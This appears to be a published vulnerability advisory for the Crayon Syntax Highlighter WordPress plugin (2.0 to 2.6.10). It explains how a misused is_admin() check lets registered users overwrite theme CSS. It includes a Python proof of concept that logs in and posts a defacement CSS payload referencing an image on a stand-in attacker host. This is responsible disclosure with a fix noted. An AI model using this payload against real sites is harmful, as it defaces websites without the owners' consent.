g0blin Research

Follow @g0blinResearch

Crayon Syntax Highlighter 2.0 - 2.6.10, Defacement

The Crayon Syntax Highlighter plugin allows access to the AJAX method ‘crayon-theme-editor-save’ to any registered user. This is due to the incorrect usage of the ‘is_admin()’ check, to ensure users are administrators. The ‘is_admin()’ will return true on a number of different clauses, some of which have nothing to do with whether or not the user is logged in as an administrator, and as such should not be relied upon for security purposes. The ‘crayon-theme-editor-save’ method was introduced in version 2.0, as seen in this diff. The ‘is_admin()’ check was added at a later date, however provides no protection what so ever, as all requests to ‘wp-admin/admin-ajax.php’ cause this function to return true. crayon-syntax-highlighter/crayon_wp.class.php add_action('wp_ajax_nopriv_crayon-tag-editor', 'CrayonTagEditorWP::content'); add_action('wp_ajax_crayon-highlight', 'CrayonWP::ajax_highlight'); add_action('wp_ajax_nopriv_crayon-highlight', 'CrayonWP::ajax_highlight'); if (is_admin()) { add_action('wp_ajax_crayon-ajax', 'CrayonWP::ajax'); add_action('wp_ajax_crayon-theme-editor', 'CrayonThemeEditorWP::content'); add_action('wp_ajax_crayon-theme-editor-save', 'CrayonThemeEditorWP::save'); When called, the AJAX method ‘crayon-theme-editor-save’ will call the ‘save’ function within the CrayonThemeEditorWP class, defined in ‘crayon-syntax-highlighter/util/theme-editor/theme_editor.php’, as seen in this file. An attacker can craft the user provided parameters in such a way that it becomes possible to overwrite base themes with arbitrary CSS. In very old browsers this may result in a Stored Cross Site Scripting attack, however as these browsers are very rarely used any more, this report will term the vulnerability as a method to defacement. Of course, if a browser has a vulnerability when parsing images (PNG, SVG, etc) for example, it’s possible this could lead to an exploit being dropped, however the likelihood of this is low.

Homepage

https://wordpress.org/plugins/crayon-syntax-highlighter/

CVSS Score

4

CSSS Vector

(AV:N/AC:L/Au:S/C:N/I:P/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 2.7.0.

Proof of Concept

The following PoC will overwrite the ‘Classic’ theme with our own arbitrary CSS. This allows for defacement of the target site, on pages where the Crayon Syntax Highlighter is used. The CSS defined in the ‘css’ payload will cause all elements within the BODY element to be hidden, for the string of ‘testing’ to be inserted after the BODY tag, and for the background image of the HTML element to be changed to an arbitrary image. 

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"crayon-theme-editor-save",
        "id":"classic",
        "name":"Classic",
        "css":"body>*{display:none} body::after{content:'testing'} html{background-image:url(http://evil.com/myimage.jpg)}",  
        "version":"2.6.10",
        "allow_edit":1,
        "allow_edit_stock_theme":1
}
r = s.post(url, data=payload)

Timeline

  • 2015-03-22: Discovered
  • 2015-03-22: Vendor notified
  • 2015-03-22: Vendor responded
  • 2015-03-31: Update requested from Vendor
  • 2015-04-05: Vendor updated with fix method – stating would be released in the next few days
  • 2015-04-13: Update requested from Vendor
  • 2015-04-13: 2.7.0 Released – issue resolved
  • 2015-04-20: Advisory released